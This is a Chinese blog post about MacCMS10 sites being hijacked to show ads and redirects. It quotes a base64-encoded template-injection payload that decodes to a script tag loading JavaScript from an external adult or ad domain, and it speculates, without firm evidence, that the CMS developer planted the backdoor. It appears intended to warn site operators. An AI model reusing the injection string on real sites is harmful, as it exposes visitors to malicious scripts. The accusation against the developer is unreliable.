当前位置: 首页 > 工具软件 > 50CMS > 使用案例 >

苹果cms10的一次尝试发现了苹果cms10被挂马极有可能是苹果cms作者故意的js漏洞或后门导致

施辉
2023-12-01

最近闲无事想建个站来玩玩,但是又不想写于是乎就找了搜索了一下,苹果cms就出现在搜索引擎上面了,看来苹果cms的SEO做的还是不错的.

被挂马表现:

  • 播放视频时,有一定的概率会加载 http://union.maccms.com/html/top10.js
  • 苹果cms后台某处或者采集的资源打印奇怪的字符比如
    {if-A:printf(base64_decode("PHNjcmlwdCBzcmM9aHR0cHM6Ly9hZDIxMjMubHNqcG9ybi50b3AvdXBsb2FkL2FhYWEuanM+PC9zY3JpcHQ+"))}{endif-A}{if-A:printf(base64_decode("PHNjcmlwdCBzcmM9aHR0cHM6Ly9hZDIxMjMubHNqcG9ybi50b3AvdXBsb2FkL2FhYWEuanM+PC9zY3JpcHQ+"))}{endif-A}{if-A:printf(base64_decode("PHNjcmlwdCBzcmM9aHR0cHM6Ly9hZDIxMjMubHNqcG9ybi50b3AvdXBsb2FkL2FhYWEuanM+PC9zY3JpcHQ+"))}{endif-A}
    解码其中的Base64的字符串后是
    <script src=https://ad2123.lsjporn.top/upload/aaaa.js></script>
    这也就是传说中的DOM XSS攻击

其实苹果CMS一直以来都是加密了最重要的播放器载入js,而且一直在打开播放页的时候 player.js 会载入一个,//union.maccms.com/html/top10.js 文件,最近作者在这个文件当中加入了广告代码,所以苹果CMS全线跳广告,很多人以为被黑了,其实很多人猜测极大的可能性是作者作妖.不然为什么他要把开源的到github上面的static/js/player.js加密干嘛呢?

其实有去群里问过苹果cms的作者 union.maccms.com/html/top10.js 是干嘛用的,他说是防盗版程序用的,
然后就把关于,这个对话给删掉了(作者是群主).我在想既然都已经开源出来还防什么盗版嘛?

我想,为什么作者为什么不搞个社区版本,然后加个收费版呢?后来一想搞收费版本不如搞偷偷摸摸搞个跳转把站长的流量导到自己的站点放广告来的钱多.

我现在是博客时间写于是2020年10月30号(凌晨,程序员晚睡),
这里:记苹果CMS播放页被劫持跳转至棋牌网站的解决方案 2019年有人写的一篇博文,关于苹果cms后门是作者故意留的.当然篇博客写的方法对现在的苹果cms留的后门已经无效的了.因为它已经换了加密的方法.

解决方法

换一个cms系统: 比如 海洋cms, 马克斯cms, 飞飞cms, 赞片cms, 等等

 类似资料: